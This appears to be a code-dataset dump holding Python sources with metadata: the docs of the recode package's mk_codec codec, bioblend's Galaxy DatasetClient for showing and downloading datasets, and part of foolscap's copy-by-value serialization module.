(with the standard PCM_16 format), you'd do it this way:
>>> encoder, decoder = mk_codec('hh')
>>> pcm_bytes = encoder(iter(multi_channel_stream))
>>> pcm_bytes
b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff'
>>> decoder(pcm_bytes)
[(3, -1), (4, -1), (5, -9)]
The `n_channels` and `chk_size_bytes` arguments are there if you want to assert
that your number of channels and chunk size are what you expect.
Again, these are just for verification, because we know how easy it is to
misspecify the `chk_format`, and how hard it can be to notice that we did.
It is advised to use these in any production code, for the sanity of everyone!
>>> mk_codec('hhh', n_channels=2)
Traceback (most recent call last):
...
AssertionError: You said there'd be 2 channels, but I inferred 3
>>> mk_codec('hhh', chk_size_bytes=3)
Traceback (most recent call last):
...
AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6
Finally, so far we've done it this way:
>>> encoder, decoder = mk_codec('hHifd')
But see that what's actually returned is a NAMED tuple, which means that you can
can also get one object that will have `.encode` and `.decode` properties:
>>> codec = mk_codec('hHifd')
>>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]]
>>> encoded = codec.encode(to_encode)
>>> decoded = codec.decode(encoded)
>>> decoded
[(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)]
And you can checkout the properties of your encoder and decoder (they
should be the same)
>>> codec.encode.chk_format
'hHifd'
>>> codec.encode.n_channels
5
>>> codec.encode.chk_size_bytes
24
"""
from recode.base import mk_codec  # main interface function

# Explicit self-assignment marks mk_codec as an intentional public re-export
# (keeps linters from flagging the import above as unused).
mk_codec = mk_codec

from recode.util import spy, get_struct, list_of_dicts
from recode.base import *
from recode.audio import (
    # encode_wav,
    # decode_wav,
    # BUG FIX: encode_wav_header_bytes and decode_wav_header_bytes were each
    # listed twice in this import; the duplicates are removed.
    encode_wav_header_bytes,
    decode_wav_header_bytes,
    mk_pcm_audio_codec,
)
|
r"""
Make codecs for fixed size structured chunks serialization and deserialization of
sequences, tabular data, and time-series.
The easiest and biggest bang for your buck is ``mk_codec``
>>> from recode import mk_codec
>>> encoder, decoder = mk_codec()
``encoder`` will encode a list (or any iterable) of numbers into bytes
>>> b = encoder([0, -3, 3.14])
>>> b
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@'
``decoder`` will decode those bytes to get you back your numbers
>>> decoder(b)
[0.0, -3.0, 3.14]
There's only really one argument you need to know about in ``mk_codec``.
The first argument, called `chk_format`, which is a string of characters from
the "Format" column of
https://docs.python.org/3/library/struct.html#format-characters
The length of the string specifies the number of "channels",
and each individual character of the string specifies the kind of encoding you should
apply to each "channel" (hold your horses, we'll explain).
The one we've just been through is in fact
>>> encoder, decoder = mk_codec('d')
That is, it will expect that your data is a list of numbers, and they'll be encoded
with the 'd' format character, that is 8-bytes doubles.
That default is good because it gives you a lot of room, but if you knew that you
would only be dealing with 2-byte integers (as in most WAV audio waveforms),
you would have chosen `h`:
>>> encoder, decoder = mk_codec('h')
What about those channels?
Well, sometimes you need to encode/decode multi-channel streams, such as:
>>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]]
Say, for example, if you were dealing with stereo waveform
(with the standard PCM_16 format), you'd do it this way:
>>> encoder, decoder = mk_codec('hh')
>>> pcm_bytes = encoder(iter(multi_channel_stream))
>>> pcm_bytes
b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff'
>>> decoder(pcm_bytes)
[(3, -1), (4, -1), (5, -9)]
The `n_channels` and `chk_size_bytes` arguments are there if you want to assert
that your number of channels and chunk size are what you expect.
Again, these are just for verification, because we know how easy it is to
misspecify the `chk_format`, and how hard it can be to notice that we did.
It is advised to use these in any production code, for the sanity of everyone!
>>> mk_codec('hhh', n_channels=2)
Traceback (most recent call last):
...
AssertionError: You said there'd be 2 channels, but I inferred 3
>>> mk_codec('hhh', chk_size_bytes=3)
Traceback (most recent call last):
...
AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6
Finally, so far we've done it this way:
>>> encoder, decoder = mk_codec('hHifd')
But see that what's actually returned is a NAMED tuple, which means that you can
can also get one object that will have `.encode` and `.decode` properties:
>>> codec = mk_codec('hHifd')
>>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]]
>>> encoded = codec.encode(to_encode)
>>> decoded = codec.decode(encoded)
>>> decoded
[(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)]
And you can checkout the properties of your encoder and decoder (they
should be the same)
>>> codec.encode.chk_format
'hHifd'
>>> codec.encode.n_channels
5
>>> codec.encode.chk_size_bytes
24
"""
from recode.base import mk_codec  # main interface function

# Explicit self-assignment marks mk_codec as an intentional public re-export
# (keeps linters from flagging the import above as unused).
mk_codec = mk_codec

from recode.util import spy, get_struct, list_of_dicts
from recode.base import *
from recode.audio import (
    # encode_wav,
    # decode_wav,
    # BUG FIX: encode_wav_header_bytes and decode_wav_header_bytes were each
    # listed twice in this import; the duplicates are removed.
    encode_wav_header_bytes,
    decode_wav_header_bytes,
    mk_pcm_audio_codec,
)
|
en
| 0.825712
|
Make codecs for fixed size structured chunks serialization and deserialization of sequences, tabular data, and time-series. The easiest and bigest bang for your buck is ``mk_codec`` >>> from recode import mk_codec >>> encoder, decoder = mk_codec() ``encoder`` will encode a list (or any iterable) of numbers into bytes >>> b = encoder([0, -3, 3.14]) >>> b b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@' ``decoder`` will decode those bytes to get you back your numbers >>> decoder(b) [0.0, -3.0, 3.14] There's only really one argument you need to know about in ``mk_codec``. The first argument, called `chk_format`, which is a string of characters from the "Format" column of https://docs.python.org/3/library/struct.html#format-characters The length of the string specifies the number of "channels", and each individual character of the string specifies the kind of encoding you should apply to each "channel" (hold your horses, we'll explain). The one we've just been through is in fact >>> encoder, decoder = mk_codec('d') That is, it will expect that your data is a list of numbers, and they'll be encoded with the 'd' format character, that is 8-bytes doubles. That default is goo because it gives you a lot of room, but if you knew that you would only be dealing with 2-byte integers (as in most WAV audio waveforms), you would have chosen `h`: >>> encoder, decoder = mk_codec('h') What about those channels? 
Well, some times you need to encode/decode multi-channel streams, such as: >>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]] Say, for example, if you were dealing with stereo waveform (with the standard PCM_16 format), you'd do it this way: >>> encoder, decoder = mk_codec('hh') >>> pcm_bytes = encoder(iter(multi_channel_stream)) >>> pcm_bytes b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff' >>> decoder(pcm_bytes) [(3, -1), (4, -1), (5, -9)] The `n_channels` and `chk_size_bytes` arguments are there if you want to assert that your number of channels and chunk size are what you expect. Again, these are just for verification, because we know how easy it is to misspecify the `chk_format`, and how hard it can be to notice that we did. It is advised to use these in any production code, for the sanity of everyone! >>> mk_codec('hhh', n_channels=2) Traceback (most recent call last): ... AssertionError: You said there'd be 2 channels, but I inferred 3 >>> mk_codec('hhh', chk_size_bytes=3) Traceback (most recent call last): ... AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6 Finally, so far we've done it this way: >>> encoder, decoder = mk_codec('hHifd') But see that what's actually returned is a NAMED tuple, which means that you can can also get one object that will have `.encode` and `.decode` properties: >>> codec = mk_codec('hHifd') >>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]] >>> encoded = codec.encode(to_encode) >>> decoded = codec.decode(encoded) >>> decoded [(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)] And you can checkout the properties of your encoder and decoder (they should be the same) >>> codec.encode.chk_format 'hHifd' >>> codec.encode.n_channels 5 >>> codec.encode.chk_size_bytes 24 # main interface function # encode_wav, # decode_wav,
| 3.188974
| 3
|
bioblend/galaxy/datasets/__init__.py
|
davidchristiany/bioblend
| 0
|
6627623
|
<reponame>davidchristiany/bioblend
"""
Contains possible interactions with the Galaxy Datasets
"""
import logging
import os
import shlex
import time
from six.moves.urllib.parse import urljoin
from six.moves.urllib.request import urlopen
import bioblend
from bioblend.galaxy.client import Client
# Module-level logger, named after this module per logging convention.
log = logging.getLogger(__name__)
# Dataset states in which Galaxy has finished processing (successfully or
# not); polling in DatasetClient._block_until_dataset_terminal stops once the
# dataset reaches one of these.
terminal_states = ('ok', 'empty', 'error', 'discarded', 'failed_metadata')
class DatasetClient(Client):
    """Client for the Galaxy ``datasets`` API endpoint."""

    def __init__(self, galaxy_instance):
        # Module name used by the base Client to build request URLs.
        self.module = 'datasets'
        super(DatasetClient, self).__init__(galaxy_instance)

    def show_dataset(self, dataset_id, deleted=False, hda_ldda='hda'):
        """
        Get details about a given dataset. This can be a history or a library dataset.
        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        :type deleted: bool
        :param deleted: Whether to return results for a deleted dataset
        :type hda_ldda: str
        :param hda_ldda: Whether to show a history dataset ('hda' - the default) or library
          dataset ('ldda').
        :rtype: dict
        :return: Information about the HDA or LDDA
        """
        params = dict(
            hda_ldda=hda_ldda,
        )
        return self._get(id=dataset_id, deleted=deleted, params=params)

    def download_dataset(self, dataset_id, file_path=None, use_default_filename=True,
                         maxwait=12000):
        """
        Download a dataset to file or in memory. If the dataset state is not
        'ok', a ``DatasetStateException`` will be thrown.
        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        :type file_path: str
        :param file_path: If this argument is provided, the dataset will be streamed to disk
                          at that path (should be a directory if ``use_default_filename=True``).
                          If the file_path argument is not provided, the dataset content is loaded into memory
                          and returned by the method (Memory consumption may be heavy as the entire file
                          will be in memory).
        :type use_default_filename: bool
        :param use_default_filename: If ``True``, the exported
                                 file will be saved as ``file_path/%s``,
                                 where ``%s`` is the dataset name.
                                 If ``False``, ``file_path`` is assumed to
                                 contain the full file path including the filename.
        :type maxwait: float
        :param maxwait: Total time (in seconds) to wait for the dataset state to
          become terminal. If the dataset state is not terminal within this
          time, a ``DatasetTimeoutException`` will be thrown.
        :rtype: dict
        :return: If a ``file_path`` argument is not provided, returns a dict containing the file content.
                 Otherwise returns nothing.
        """
        # Poll until the dataset is in a terminal state (may raise
        # DatasetTimeoutException); only 'ok' is downloadable.
        dataset = self._block_until_dataset_terminal(dataset_id, maxwait=maxwait)
        if not dataset['state'] == 'ok':
            raise DatasetStateException("Dataset state is not 'ok'. Dataset id: %s, current state: %s" % (dataset_id, dataset['state']))
        # Galaxy release_13.01 and earlier does not have file_ext in the dataset
        # dict, so resort to data_type.
        # N.B.: data_type cannot be used for Galaxy release_14.10 and later
        # because it was changed to the Galaxy datatype class
        file_ext = dataset.get('file_ext', dataset['data_type'])
        # Resort to 'data' when Galaxy returns an empty or temporary extension
        if not file_ext or file_ext == 'auto' or file_ext == '_sniff_':
            file_ext = 'data'
        # The preferred download URL is
        # '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>'
        # since the old URL:
        # '/dataset/<dataset_id>/display/to_ext=<dataset_ext>'
        # does not work when using REMOTE_USER with access disabled to
        # everything but /api without auth
        if 'url' in dataset:
            # This is Galaxy release_15.03 or later
            download_url = dataset['download_url'] + '?to_ext=' + file_ext
        else:
            # This is Galaxy release_15.01 or earlier, for which the preferred
            # URL does not work without a key, so resort to the old URL
            download_url = 'datasets/' + dataset_id + '/display?to_ext=' + file_ext
        url = urljoin(self.gi.base_url, download_url)
        # Stream to disk only when a destination path was given; otherwise the
        # whole response body is buffered in memory.
        stream_content = file_path is not None
        r = self.gi.make_get_request(url, stream=stream_content)
        r.raise_for_status()
        if file_path is None:
            # In-memory mode: sanity-check the transfer size when the server
            # advertised one, then return the raw bytes.
            if 'content-length' in r.headers and len(r.content) != int(r.headers['content-length']):
                log.warning("Transferred content size does not match content-length header (%s != %s)" % (len(r.content), r.headers['content-length']))
            return r.content
        else:
            if use_default_filename:
                # Build a useable filename
                filename = dataset['name'] + '.' + file_ext
                # Now try to get a better filename from the response headers
                # We expect tokens 'filename' '=' to be followed by the quoted filename
                if 'content-disposition' in r.headers:
                    tokens = list(shlex.shlex(r.headers['content-disposition'], posix=True))
                    try:
                        # tokens[index('filename') + 2] skips the '=' token to
                        # reach the (possibly quoted) filename value.
                        header_filepath = tokens[tokens.index('filename') + 2]
                        filename = os.path.basename(header_filepath)
                    except (ValueError, IndexError):
                        # Header absent or malformed: keep the fallback name.
                        pass
                file_local_path = os.path.join(file_path, filename)
            else:
                file_local_path = file_path
            with open(file_local_path, 'wb') as fp:
                for chunk in r.iter_content(chunk_size=bioblend.CHUNK_SIZE):
                    if chunk:
                        fp.write(chunk)
            # Return location file was saved to
            return file_local_path

    def _block_until_dataset_terminal(self, dataset_id, maxwait=12000, interval=3):
        """
        Wait until the dataset state is terminal ('ok', 'empty', 'error',
        'discarded' or 'failed_metadata').

        Polls ``show_dataset`` every ``interval`` seconds for up to ``maxwait``
        seconds; raises ``DatasetTimeoutException`` if time runs out.
        """
        assert maxwait >= 0
        assert interval > 0
        time_left = maxwait
        while True:
            dataset = self.show_dataset(dataset_id)
            state = dataset['state']
            if state in terminal_states:
                return dataset
            # Budget is decremented *before* sleeping, so the final sleep is
            # capped at whatever time remains.
            time_left -= interval
            if time_left > 0:
                log.warning("Waiting for dataset %s to complete. Will wait %i more s" % (dataset_id, time_left))
                time.sleep(min(time_left, interval))
            else:
                raise DatasetTimeoutException("Waited too long for dataset %s to complete" % dataset_id)

    def show_stderr(self, dataset_id):
        """
        Get the stderr output of a dataset.
        .. deprecated:: 0.9.0
           Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
           ``full_details=True`` instead.
        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        """
        # The slice drops the trailing 13 characters of self.url — presumably
        # it ends with '/api/datasets' so this recovers the server base URL
        # before hitting the legacy /datasets/<id>/stderr page. TODO confirm.
        res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stderr")
        return res.read()

    def show_stdout(self, dataset_id):
        """
        Get the stdout output of a dataset.
        .. deprecated:: 0.9.0
           Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
           ``full_details=True`` instead.
        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        """
        # Same legacy-URL reconstruction as show_stderr; see the note there.
        res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stdout")
        return res.read()
class DatasetStateException(Exception):
    """Raised when a dataset reaches a terminal state other than 'ok'."""
class DatasetTimeoutException(Exception):
    """Raised when a dataset fails to reach a terminal state within maxwait."""
|
"""
Contains possible interactions with the Galaxy Datasets
"""
import logging
import os
import shlex
import time
from six.moves.urllib.parse import urljoin
from six.moves.urllib.request import urlopen
import bioblend
from bioblend.galaxy.client import Client
log = logging.getLogger(__name__)
terminal_states = ('ok', 'empty', 'error', 'discarded', 'failed_metadata')
class DatasetClient(Client):
    """
    Contains possible interactions with the Galaxy Datasets.
    """

    def __init__(self, galaxy_instance):
        self.module = 'datasets'
        super(DatasetClient, self).__init__(galaxy_instance)

    def show_dataset(self, dataset_id, deleted=False, hda_ldda='hda'):
        """
        Get details about a given dataset. This can be a history or a library dataset.

        :type dataset_id: str
        :param dataset_id: Encoded dataset ID

        :type deleted: bool
        :param deleted: Whether to return results for a deleted dataset

        :type hda_ldda: str
        :param hda_ldda: Whether to show a history dataset ('hda' - the default) or library
          dataset ('ldda').

        :rtype: dict
        :return: Information about the HDA or LDDA
        """
        params = dict(
            hda_ldda=hda_ldda,
        )
        return self._get(id=dataset_id, deleted=deleted, params=params)

    def download_dataset(self, dataset_id, file_path=None, use_default_filename=True,
                         maxwait=12000):
        """
        Download a dataset to file or in memory. If the dataset state is not
        'ok', a ``DatasetStateException`` will be thrown.

        :type dataset_id: str
        :param dataset_id: Encoded dataset ID

        :type file_path: str
        :param file_path: If this argument is provided, the dataset will be streamed to disk
          at that path (should be a directory if ``use_default_filename=True``).
          If the file_path argument is not provided, the dataset content is loaded into memory
          and returned by the method (Memory consumption may be heavy as the entire file
          will be in memory).

        :type use_default_filename: bool
        :param use_default_filename: If ``True``, the exported
          file will be saved as ``file_path/%s``,
          where ``%s`` is the dataset name.
          If ``False``, ``file_path`` is assumed to
          contain the full file path including the filename.

        :type maxwait: float
        :param maxwait: Total time (in seconds) to wait for the dataset state to
          become terminal. If the dataset state is not terminal within this
          time, a ``DatasetTimeoutException`` will be thrown.

        :rtype: dict
        :return: If a ``file_path`` argument is not provided, returns a dict containing the file content.
          Otherwise returns nothing.
        """
        dataset = self._block_until_dataset_terminal(dataset_id, maxwait=maxwait)
        # Idiomatic inequality test (was: `if not dataset['state'] == 'ok'`)
        if dataset['state'] != 'ok':
            raise DatasetStateException("Dataset state is not 'ok'. Dataset id: %s, current state: %s" % (dataset_id, dataset['state']))
        # Galaxy release_13.01 and earlier does not have file_ext in the dataset
        # dict, so resort to data_type.
        # N.B.: data_type cannot be used for Galaxy release_14.10 and later
        # because it was changed to the Galaxy datatype class
        file_ext = dataset.get('file_ext', dataset['data_type'])
        # Resort to 'data' when Galaxy returns an empty or temporary extension
        if not file_ext or file_ext in ('auto', '_sniff_'):
            file_ext = 'data'
        # The preferred download URL is
        # '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>'
        # since the old URL:
        # '/dataset/<dataset_id>/display/to_ext=<dataset_ext>'
        # does not work when using REMOTE_USER with access disabled to
        # everything but /api without auth
        if 'url' in dataset:
            # This is Galaxy release_15.03 or later
            download_url = dataset['download_url'] + '?to_ext=' + file_ext
        else:
            # This is Galaxy release_15.01 or earlier, for which the preferred
            # URL does not work without a key, so resort to the old URL
            download_url = 'datasets/' + dataset_id + '/display?to_ext=' + file_ext
        url = urljoin(self.gi.base_url, download_url)

        # Stream the response to disk only when a destination path was given;
        # otherwise buffer the whole body in memory and return it.
        stream_content = file_path is not None
        r = self.gi.make_get_request(url, stream=stream_content)
        r.raise_for_status()

        if file_path is None:
            if 'content-length' in r.headers and len(r.content) != int(r.headers['content-length']):
                # Lazy %-style logging arguments (evaluated only if emitted)
                log.warning("Transferred content size does not match content-length header (%s != %s)",
                            len(r.content), r.headers['content-length'])
            return r.content
        else:
            if use_default_filename:
                # Build a useable filename
                filename = dataset['name'] + '.' + file_ext
                # Now try to get a better filename from the response headers
                # We expect tokens 'filename' '=' to be followed by the quoted filename
                if 'content-disposition' in r.headers:
                    tokens = list(shlex.shlex(r.headers['content-disposition'], posix=True))
                    try:
                        header_filepath = tokens[tokens.index('filename') + 2]
                        filename = os.path.basename(header_filepath)
                    except (ValueError, IndexError):
                        # Malformed or filename-less header: keep the default name
                        pass
                file_local_path = os.path.join(file_path, filename)
            else:
                file_local_path = file_path
            with open(file_local_path, 'wb') as fp:
                for chunk in r.iter_content(chunk_size=bioblend.CHUNK_SIZE):
                    if chunk:
                        fp.write(chunk)
            # Return location file was saved to
            return file_local_path

    def _block_until_dataset_terminal(self, dataset_id, maxwait=12000, interval=3):
        """
        Wait until the dataset state is terminal ('ok', 'empty', 'error',
        'discarded' or 'failed_metadata').

        :raises DatasetTimeoutException: if the dataset state is still
          non-terminal after ``maxwait`` seconds.
        """
        assert maxwait >= 0
        assert interval > 0
        time_left = maxwait
        while True:
            dataset = self.show_dataset(dataset_id)
            state = dataset['state']
            if state in terminal_states:
                return dataset
            time_left -= interval
            if time_left > 0:
                log.warning("Waiting for dataset %s to complete. Will wait %i more s",
                            dataset_id, time_left)
                time.sleep(min(time_left, interval))
            else:
                raise DatasetTimeoutException("Waited too long for dataset %s to complete" % dataset_id)

    def show_stderr(self, dataset_id):
        """
        Get the stderr output of a dataset.

        .. deprecated:: 0.9.0
           Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
           ``full_details=True`` instead.

        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        """
        # self.url ends with '/api/datasets'; strip that suffix to reach the
        # non-API per-dataset stderr endpoint on the server root.
        res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stderr")
        return res.read()

    def show_stdout(self, dataset_id):
        """
        Get the stdout output of a dataset.

        .. deprecated:: 0.9.0
           Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
           ``full_details=True`` instead.

        :type dataset_id: str
        :param dataset_id: Encoded dataset ID
        """
        res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stdout")
        return res.read()
class DatasetStateException(Exception):
    """Raised when a dataset reaches a terminal state other than 'ok'."""
    pass
class DatasetTimeoutException(Exception):
    """Raised when a dataset does not become terminal within ``maxwait`` seconds."""
    pass
|
en
| 0.699391
|
Contains possible interactions with the Galaxy Datasets Get details about a given dataset. This can be a history or a library dataset. :type dataset_id: str :param dataset_id: Encoded dataset ID :type deleted: bool :param deleted: Whether to return results for a deleted dataset :type hda_ldda: str :param hda_ldda: Whether to show a history dataset ('hda' - the default) or library dataset ('ldda'). :rtype: dict :return: Information about the HDA or LDDA Download a dataset to file or in memory. If the dataset state is not 'ok', a ``DatasetStateException`` will be thrown. :type dataset_id: str :param dataset_id: Encoded dataset ID :type file_path: str :param file_path: If this argument is provided, the dataset will be streamed to disk at that path (should be a directory if ``use_default_filename=True``). If the file_path argument is not provided, the dataset content is loaded into memory and returned by the method (Memory consumption may be heavy as the entire file will be in memory). :type use_default_filename: bool :param use_default_filename: If ``True``, the exported file will be saved as ``file_path/%s``, where ``%s`` is the dataset name. If ``False``, ``file_path`` is assumed to contain the full file path including the filename. :type maxwait: float :param maxwait: Total time (in seconds) to wait for the dataset state to become terminal. If the dataset state is not terminal within this time, a ``DatasetTimeoutException`` will be thrown. :rtype: dict :return: If a ``file_path`` argument is not provided, returns a dict containing the file content. Otherwise returns nothing. # Galaxy release_13.01 and earlier does not have file_ext in the dataset # dict, so resort to data_type. 
# N.B.: data_type cannot be used for Galaxy release_14.10 and later # because it was changed to the Galaxy datatype class # Resort to 'data' when Galaxy returns an empty or temporary extension # The preferred download URL is # '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>' # since the old URL: # '/dataset/<dataset_id>/display/to_ext=<dataset_ext>' # does not work when using REMOTE_USER with access disabled to # everything but /api without auth # This is Galaxy release_15.03 or later # This is Galaxy release_15.01 or earlier, for which the preferred # URL does not work without a key, so resort to the old URL # Build a useable filename # Now try to get a better filename from the response headers # We expect tokens 'filename' '=' to be followed by the quoted filename # Return location file was saved to Wait until the dataset state is terminal ('ok', 'empty', 'error', 'discarded' or 'failed_metadata'). Get the stderr output of a dataset. .. deprecated:: 0.9.0 Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with ``full_details=True`` instead. :type dataset_id: str :param dataset_id: Encoded dataset ID Get the stdout output of a dataset. .. deprecated:: 0.9.0 Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with ``full_details=True`` instead. :type dataset_id: str :param dataset_id: Encoded dataset ID
| 2.646211
| 3
|
src/foolscap/copyable.py
|
jaraco/foolscap
| 29
|
6627624
|
# -*- test-case-name: foolscap.test.test_copyable -*-
# this module is responsible for all copy-by-value objects
import six
from zope.interface import interface, implementer
from twisted.python import reflect, log
from twisted.python.components import registerAdapter
from twisted.internet import defer
from . import slicer, tokens
from .tokens import BananaError, Violation
from foolscap.constraint import OpenerConstraint, IConstraint, Optional
Interface = interface.Interface
############################################################
# the first half of this file is sending/serialization
class ICopyable(Interface):
    """I represent an object which is passed-by-value across PB connections.
    """
    # NOTE: zope.interface method declarations take no 'self' parameter.
    def getTypeToCopy():
        """Return a string which names the class. This string must match the
        one that gets registered at the receiving end. This is typically a
        URL of some sort, in a namespace which you control."""
    def getStateToCopy():
        """Return a state dictionary (with plain-string keys) which will be
        serialized and sent to the remote end. This state object will be
        given to the receiving object's setCopyableState method."""
@implementer(ICopyable)
class Copyable(object):
    """Base class for objects sent by value over PB.

    Subclasses must define a 'typeToCopy' attribute naming the wire type.
    """

    def getTypeToCopy(self):
        # Surface a clearer error than a bare AttributeError when the
        # subclass forgot to declare its wire-type name.
        try:
            return self.typeToCopy
        except AttributeError:
            raise RuntimeError("Copyable subclasses must specify 'typeToCopy'")

    def getStateToCopy(self):
        # Default: copy the whole instance dictionary.
        return self.__dict__
class CopyableSlicer(slicer.BaseSlicer):
    """Serialize ICopyable objects (things which are copied by value)."""

    def slice(self, streamable, banana):
        self.streamable = streamable
        yield b'copyable'
        copytype = self.obj.getTypeToCopy()
        assert isinstance(copytype, str)
        yield six.ensure_binary(copytype)
        # Emit the state dict as alternating key/value tokens.
        for key, value in self.obj.getStateToCopy().items():
            yield six.ensure_binary(key)
            yield value

    def describe(self):
        return "<%s>" % (self.obj.getTypeToCopy(),)
registerAdapter(CopyableSlicer, ICopyable, tokens.ISlicer)
class Copyable2(slicer.BaseSlicer):
    """A Copyable that acts as its own Slicer.

    This has more methods than you'd usually want in a base class, but if
    you can't register an Adapter for a whole class hierarchy then you may
    have to use it.
    """

    def getTypeToCopy(self):
        return reflect.qual(self.__class__)

    def getStateToCopy(self):
        return self.__dict__

    def slice(self, streamable, banana):
        self.streamable = streamable
        yield b'instance'
        wiretype = self.getTypeToCopy()
        yield six.ensure_binary(wiretype)
        yield self.getStateToCopy()

    def describe(self):
        return "<%s>" % (self.getTypeToCopy(),)
#registerRemoteCopy(typename, factory)
#registerUnslicer(typename, factory)
def registerCopier(klass, copier):
    """Shortcut for arranging to serialize third-party classes.

    'copier' must be a callable which accepts an instance of the class you
    want to serialize, and returns a tuple of (typename, state_dictionary).
    If it returns a typename of None, the original class's fully-qualified
    classname is used.
    """
    default_typename = reflect.qual(klass)

    @implementer(ICopyable)
    class _CopierAdapter:
        def __init__(self, original):
            self.nameToCopy, self.state = copier(original)
            if self.nameToCopy is None:
                # copier declined to name the type: fall back to the
                # fully-qualified class name captured above
                self.nameToCopy = default_typename

        def getTypeToCopy(self):
            return self.nameToCopy

        def getStateToCopy(self):
            return self.state

    registerAdapter(_CopierAdapter, klass, ICopyable)
############################################################
# beyond here is the receiving/deserialization side
class RemoteCopyUnslicer(slicer.BaseUnslicer):
    """Rebuild a Copyable that was sent by value.

    Collects alternating attribute-name/value tokens into ``self.d``, then
    calls ``factory(self.d)`` when the sequence closes. ``stateSchema`` (if
    provided) constrains each incoming attribute value as it arrives.
    """
    attrname = None
    attrConstraint = None

    def __init__(self, factory, stateSchema):
        self.factory = factory
        self.schema = stateSchema

    def start(self, count):
        self.d = {}
        self.count = count
        # Register a Deferred up front so reference cycles back to this
        # object (e.g. 'obj.foo = obj') can be resolved once it exists.
        self.deferred = defer.Deferred()
        self.protocol.setObject(count, self.deferred)

    def checkToken(self, typebyte, size):
        if self.attrname is None:
            # The next token is an attribute *name*: must be a string token.
            if typebyte not in (tokens.STRING, tokens.VOCAB):
                raise BananaError("RemoteCopyUnslicer keys must be STRINGs")
        else:
            if self.attrConstraint:
                self.attrConstraint.checkToken(typebyte, size)

    def doOpen(self, opentype):
        if self.attrConstraint:
            self.attrConstraint.checkOpentype(opentype)
        unslicer = self.open(opentype)
        if unslicer:
            if self.attrConstraint:
                unslicer.setConstraint(self.attrConstraint)
        return unslicer

    def receiveChild(self, obj, ready_deferred=None):
        assert not isinstance(obj, defer.Deferred)
        assert ready_deferred is None
        if self.attrname is None:
            # This child is an attribute name.
            attrname = six.ensure_str(obj)
            if attrname in self.d:
                raise BananaError("duplicate attribute name '%s'" % attrname)
            s = self.schema
            if s:
                accept, self.attrConstraint = s.getAttrConstraint(attrname)
                assert accept
            self.attrname = attrname
        else:
            # This child is the value for the pending attribute name.
            if isinstance(obj, defer.Deferred):
                # TODO: this is an artificial restriction, and it might
                # be possible to remove it, but I need to think through
                # it carefully first
                raise BananaError("unreferenceable object in attribute")
            self.setAttribute(self.attrname, obj)
            self.attrname = None
            self.attrConstraint = None

    def setAttribute(self, name, value):
        self.d[name] = value

    def receiveClose(self):
        try:
            obj = self.factory(self.d)
        except:
            # Log which factory failed, then re-raise unchanged.
            log.msg("%s.receiveClose: problem in factory %s" %
                    (self.__class__.__name__, self.factory))
            log.err()
            raise
        self.protocol.setObject(self.count, obj)
        self.deferred.callback(obj)
        return obj, None

    def describe(self):
        # BUG FIX: this class never assigns 'classname', so the original
        # direct 'self.classname' access raised AttributeError. Use getattr
        # with a None default so a missing attribute yields "<??>".
        classname = getattr(self, "classname", None)
        if classname is None:
            return "<??>"
        me = "<%s>" % classname
        if self.attrname is None:
            return "%s.attrname??" % me
        else:
            return "%s.%s" % (me, self.attrname)
class NonCyclicRemoteCopyUnslicer(RemoteCopyUnslicer):
    # The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy
    # is participating in a reference cycle, say 'obj.foo = obj') makes it
    # unsuitable for holding Failures (which cannot be passed through
    # Deferred.callback). Use this class for Failures. It cannot handle
    # reference cycles (they will cause a KeyError when the reference is
    # followed).

    def start(self, count):
        # Unlike the base class, no Deferred is registered with the
        # protocol here, so back-references to this object cannot resolve.
        self.d = {}
        self.count = count
        self.gettingAttrname = True

    def receiveClose(self):
        # Build the object directly; there is no Deferred to fire.
        obj = self.factory(self.d)
        return obj, None
class IRemoteCopy(Interface):
    """This interface defines what a RemoteCopy class must do. RemoteCopy
    subclasses are used as factories to create objects that correspond to
    Copyables sent over the wire.

    Note that the constructor of an IRemoteCopy class will be called without
    any arguments.
    """
    # NOTE: zope.interface method declarations take no 'self' parameter.
    def setCopyableState(statedict):
        """I accept an attribute dictionary name/value pairs and use it to
        set my internal state.

        Some of the values may be Deferreds, which are placeholders for the
        as-yet-unreferenceable object which will eventually go there. If you
        receive a Deferred, you are responsible for adding a callback to
        update the attribute when it fires. [note:
        RemoteCopyUnslicer.receiveChild currently has a restriction which
